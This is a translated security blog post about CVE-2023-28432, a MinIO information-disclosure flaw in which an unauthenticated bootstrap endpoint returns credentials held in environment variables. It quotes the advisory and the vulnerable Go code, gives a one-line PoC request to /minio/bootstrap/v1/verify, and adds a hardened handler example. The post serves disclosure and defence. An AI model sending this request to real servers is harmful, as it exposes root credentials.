In a cluster deployment, MinIO returns all environment variables, including MINIO_SECRET_KEY
and MINIO_ROOT_PASSWORD, resulting in information disclosure.
All users of distributed deployments are affected. Everyone is advised to upgrade as soon as possible. (Obviously most of us broke single-node folks, me included, won't be troubled by this.)
When I saw the screenshot on Twitter
Here's some English to add a touch of class
https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q
Impact
In a cluster deployment, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD, resulting in information disclosure.
All users of distributed deployment are impacted. All users are advised to upgrade ASAP.
Patches
commit 3b5dbf90468b874e99253d241d16d175c2454077
Author: Harshavardhana <[email protected]>
Date: Mon Mar 20 01:40:24 2023 -0700
allow bootstrapping to validate internode tokens (#16853)
Workarounds
There are no known workarounds.
References
The vulnerable code:
// minio/cmd/bootstrap-peer-server.go
// The handler performs no authentication or caller check: whoever reaches the
// bootstrap endpoint gets the full server system config encoded as JSON.
func (b *bootstrapRESTServer) VerifyHandler(w http.ResponseWriter, r *http.Request) {
	ctx := newContext(r, w, "VerifyHandler")
	cfg := getServerSystemCfg()
	logger.LogIf(ctx, json.NewEncoder(w).Encode(&cfg))
}

// minio/cmd/bootstrap-peer-server.go
// Collects every MINIO_* environment variable, credentials included, into the
// config that VerifyHandler sends back; only the skipEnvs whitelist is excluded.
func getServerSystemCfg() ServerSystemConfig {
	envs := env.List("MINIO_")
	envValues := make(map[string]string, len(envs))
	for _, envK := range envs {
		// skip certain environment variables as part
		// of the whitelist and could be configured
		// differently on each nodes, update skipEnvs()
		// map if there are such environment values
		if _, ok := skipEnvs[envK]; ok {
			continue
		}
		envValues[envK] = env.Get(envK, "")
	}
	return ServerSystemConfig{
		MinioEndpoints: globalEndpoints,
		MinioEnv:       envValues,
	}
}
A ferocious round of analysis,
and one look at the actual operation shows it's dumb as a brick.
It's really just an unauthenticated endpoint.
Working overtime today; here's the PoC, I'm going to bed.
POST /minio/bootstrap/v1/verify HTTP/1.1
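To make the root cause concrete, here is an added Go example (not MinIO's code and not the author's PoC) that puts the vulnerable pattern from the snippet above next to a hardened version of the same bootstrap verify handler. The environment map, the endpoint list and the `X-Internode-Token` header name are all constructed for this example; MinIO's real internode authentication scheme is not reproduced here. The hardened handler does two things the original did not: it rejects callers that cannot present the shared internode token (compared in constant time, and refusing an empty configured token outright), and it redacts credential-looking variables even for authenticated peers, so a future auth bypass still does not hand out MINIO_SECRET_KEY or MINIO_ROOT_PASSWORD.

```go
package main

import (
	"crypto/subtle"
	"encoding/json"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// sampleEnv is a constructed stand-in for env.List("MINIO_") on a node;
// every value here is made up for this example.
var sampleEnv = map[string]string{
	"MINIO_ROOT_USER":     "minioadmin",
	"MINIO_ROOT_PASSWORD": "constructed-root-password",
	"MINIO_SECRET_KEY":    "constructed-secret-key",
	"MINIO_REGION":        "us-east-1",
}

// sampleEndpoints is a constructed endpoint list (MinIO's globalEndpoints is a richer type).
var sampleEndpoints = []string{"http://node1:9000/data", "http://node2:9000/data"}

// internodeTokenHeader is an assumed header name for this example, not MinIO's real scheme.
const internodeTokenHeader = "X-Internode-Token"

// credentialSuffixes marks MINIO_* variable names that carry secrets.
var credentialSuffixes = []string{"_SECRET_KEY", "_ROOT_PASSWORD", "_PASSWORD", "_TOKEN"}

type serverSystemConfig struct {
	MinioEndpoints []string          `json:"MinioEndpoints"`
	MinioEnv       map[string]string `json:"MinioEnv"`
}

// isCredentialEnv reports whether an environment variable name looks like a secret.
func isCredentialEnv(name string) bool {
	for _, s := range credentialSuffixes {
		if strings.HasSuffix(name, s) {
			return true
		}
	}
	return false
}

// redactEnv copies envs, replacing credential values so they never reach the wire.
func redactEnv(envs map[string]string) map[string]string {
	out := make(map[string]string, len(envs))
	for k, v := range envs {
		if isCredentialEnv(k) {
			out[k] = "[REDACTED]"
		} else {
			out[k] = v
		}
	}
	return out
}

// vulnerableVerifyHandler reproduces the advisory's pattern: no caller check,
// and the full environment map is serialized to whoever sends the request.
func vulnerableVerifyHandler(envs map[string]string) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		cfg := serverSystemConfig{MinioEndpoints: sampleEndpoints, MinioEnv: envs}
		_ = json.NewEncoder(w).Encode(&cfg)
	}
}

// hardenedVerifyHandler requires a non-empty shared internode token (constant-time
// compare) and strips credential values before encoding, even for valid peers.
func hardenedVerifyHandler(envs map[string]string, token string) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		got := r.Header.Get(internodeTokenHeader)
		if token == "" || subtle.ConstantTimeCompare([]byte(got), []byte(token)) != 1 {
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		cfg := serverSystemConfig{MinioEndpoints: sampleEndpoints, MinioEnv: redactEnv(envs)}
		_ = json.NewEncoder(w).Encode(&cfg)
	}
}

// probe sends a POST to the bootstrap verify path through the given handler
// (optionally with a token header) and returns the status code and body.
func probe(h http.HandlerFunc, token string) (int, string) {
	req := httptest.NewRequest(http.MethodPost, "/minio/bootstrap/v1/verify", nil)
	if token != "" {
		req.Header.Set(internodeTokenHeader, token)
	}
	rec := httptest.NewRecorder()
	h(rec, req)
	return rec.Code, rec.Body.String()
}

func main() {
	code, body := probe(vulnerableVerifyHandler(sampleEnv), "")
	fmt.Printf("vulnerable, no token: %d %s", code, body)
	code, body = probe(hardenedVerifyHandler(sampleEnv, "peer-token"), "")
	fmt.Printf("hardened, no token:   %d %s", code, body)
	code, body = probe(hardenedVerifyHandler(sampleEnv, "peer-token"), "peer-token")
	fmt.Printf("hardened, with token: %d %s", code, body)
}
```

Running it prints the leaked credentials from the vulnerable handler, a 401 from the hardened one for an anonymous caller, and a 200 with `[REDACTED]` values for an authenticated peer. The redaction layer is the part worth keeping regardless of how internode auth is implemented: bootstrap verification only needs to compare configuration for consistency, so peers can exchange hashes or redacted values rather than the secrets themselves.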
One more screenshot:
When will security-services grunts ever get to stand up straight!!
Originally published on the WeChat public account 蓝猫Sec: CVE-2023-28432 information disclosure vulnerability PoC